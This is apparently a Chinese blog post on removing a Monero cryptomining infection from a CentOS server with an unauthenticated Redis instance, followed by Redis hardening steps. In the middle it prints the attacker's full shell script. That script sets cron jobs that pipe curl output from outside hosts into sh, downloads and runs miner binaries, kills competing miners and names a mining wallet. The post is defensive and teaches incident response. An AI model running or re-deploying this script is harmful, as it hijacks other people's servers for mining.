写程序的时候,发现redis异常,程序启动死慢,用top命令查看了一下,cpu被占用接近100% 发生原因:在centos上安装redis并且启动 没有进行权限设置 这非常危险 Redis 未授权访问缺陷可轻易导致系统被黑 Sebug 公布了 Redis 未授权访问缺陷的详细漏洞信息,这个 Redis 未授权访问缺陷可轻易导致系统被黑。 漏洞详情:blog.jobbole.com/94518/ 最佳解决方案提问(US):http://security.stackexchange.com/questions/129448/how-can-i-kill-minerd-malware-on-an-aws-ec2-instance I found the solution to removing minerd . I was lucky enough to find the actual script that was used to infect my server. All I had to do was remove the elements placed by this script – - On monkeyoto‘s suggestion, I blocked all communication with the mining pool server –
iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP . - Removed the cron
*/15 * * * * curl -fsSL https://r.chanstring.com/api/report?pm=0706 | sh from /var/spool/cron/root and /var/spool/cron/crontabs/root . - Removed the directory
/opt/yam . - Removed
/root/.ssh/KHK75NEOiq . - Deleted the files
/opt/minerd and /opt/KHK75NEOiq33 . - Stopped the minerd process –
pkill minerd . - Stopped
lady – service lady stop .
I ran ps -eo pcpu,args --sort=-%cpu | head , top -bn2 |sed -n '7,25'p and ps aux | grep minerd after that and the malware was nowhere to be seen. I still need to figure out how it gained access into the system but I was able to disable it this way.
首先保持冷静 先关掉您的redis ps -ef | grep AnXqV 找到进程并kill 进程 这时你发现没什么卵用 过没多久 病毒又自启动了 这时我执行crontab -l 命令查看定时任务 */5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0129 | sh 执行了定时任务 删除所有的执行计划 crontab -r 再将 /var/spool/cron/crontabs/root 文件内的入侵任务删除 完整执行代码 #本入侵代码可能会随时变化 iptables -A INPUT -s xmr.crypto-pool.fr -j DROP
iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP
crontab -r #如果您还有其他定时任务执行 请不要使用该命令 请修改定时任务删除入侵所在行
vi /var/spool/cron/crontabs/root #删除入侵行代码 :wq
service lady stop
这时可以轻松看到病毒shell export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
echo "*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0129 | sh" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0129 | sh" > /var/spool/cron/crontabs/root
if [ ! -f "/tmp/ddg.219" ]; then
curl -fsSL http://www.haveabitchin.com/ddg.$(uname -m) -o /tmp/ddg.219
fi
chmod +x /tmp/ddg.219 && /tmp/ddg.219
CleanTail()
{
ps auxf|grep -v grep|grep /tmp/duckduckgo|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "/usr/bin/cron"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "/opt/cron"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "/usr/sbin/ntp"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "/opt/minerd"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9
}
DoYam()
{
if [ ! -f "/tmp/AnXqV.yam" ]; then
curl -fsSL http://www.haveabitchin.com/yam -o /tmp/AnXqV.yam
fi
chmod +x /tmp/AnXqV.yam
/tmp/AnXqV.yam -c x -M stratum+tcp://47sghzufGhJJDQEbScMCwVBimTuq6L5JiRixD8VeGbpjCTA12noXmi4ZyBZLc99e66NtnKff34fHsGRoyZk3ES1s1V4QVcB.01c32d313b74a859b904079c69dbc04ea6e37eddcf4aeb34e9400cc12831da54:x@xmr.crypto-pool.fr:443/xmr
}
DoMiner()
{
if [ ! -f "/tmp/AnXqV" ]; then
curl -fsSL http://www.haveabitchin.com/minerd -o /tmp/AnXqV
fi
chmod +x /tmp/AnXqV
/tmp/AnXqV -B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:443 -u 47sghzufGhJJDQEbScMCwVBimTuq6L5JiRixD8VeGbpjCTA12noXmi4ZyBZLc99e66NtnKff34fHsGRoyZk3ES1s1V4QVcB.01c32d313b74a859b904079c69dbc04ea6e37eddcf4aeb34e9400cc12831da54 -p x
}
ps auxf|grep -v grep|grep "4Ab9s1RRpueZN2XxTM3vDWEHcmsMoEMW3YYsbGUwQSrNDfgMKVV8GAofToNfyiBwocDYzwY5pjpsMB7MY8v4tkDU71oWpDC"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "47sghzufGhJJDQEbScMCwVBimTuq6L5JiRixD8VeGbpjCTA12noXmi4ZyBZLc99e66NtnKff34fHsGRoyZk3ES1s1V4QVcB+01c32d313b74a859b904079c69dbc04ea6e37eddcf4aeb34e9400cc12831da54"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "AnXqV" || DoMiner
ps auxf|grep -v grep|grep "AnXqV" || DoYam
这个病毒并没有硬把我的系统搞瘫痪 监控内存情况 还是比较乐观的 下面应当对redis的后门进行修复设置 如上的解决方案治标不治本 除非你不用redis了
设置redis设置 1、设置auth密码并修改端口号 进入redis安装目录 cd /home/redis-2.8.17/src/
vi redis.conf
###
port 110
requirepass mypassword
### :wq
./redis-server ./redis.conf &
当使用./redis-cli控制台的时候先输入校验 如果改变端口号了 加 -p参数进入 auth mypassword redis config配置说明 http://www.runoob.com/redis/redis-conf.html _.-``__ ''-._
_.-`` `. `_. ''-._ Redis 2.8.17 (00000000/0) 64 bit
.-`` .-```. ```\/ _.,_ ''-._
( ' , .-` | `, ) Running in stand alone mode
|`-._`-...-` __...-.``-._|'` _.-'| Port: 110
| `-._ `._ / _.-' | PID: 1754
`-._ `-._ `-./ _.-' _.-'
|`-._`-._ `-.__.-' _.-'_.-'|
| `-._`-._ _.-'_.-' | http://redis.io
`-._ `-._`-.__.-'_.-' _.-'
|`-._`-._ `-.__.-' _.-'_.-'|
| `-._`-._ _.-'_.-' |
`-._ `-._`-.__.-'_.-' _.-'
`-._ `-.__.-' _.-'
`-._ _.-'
`-.__.-' |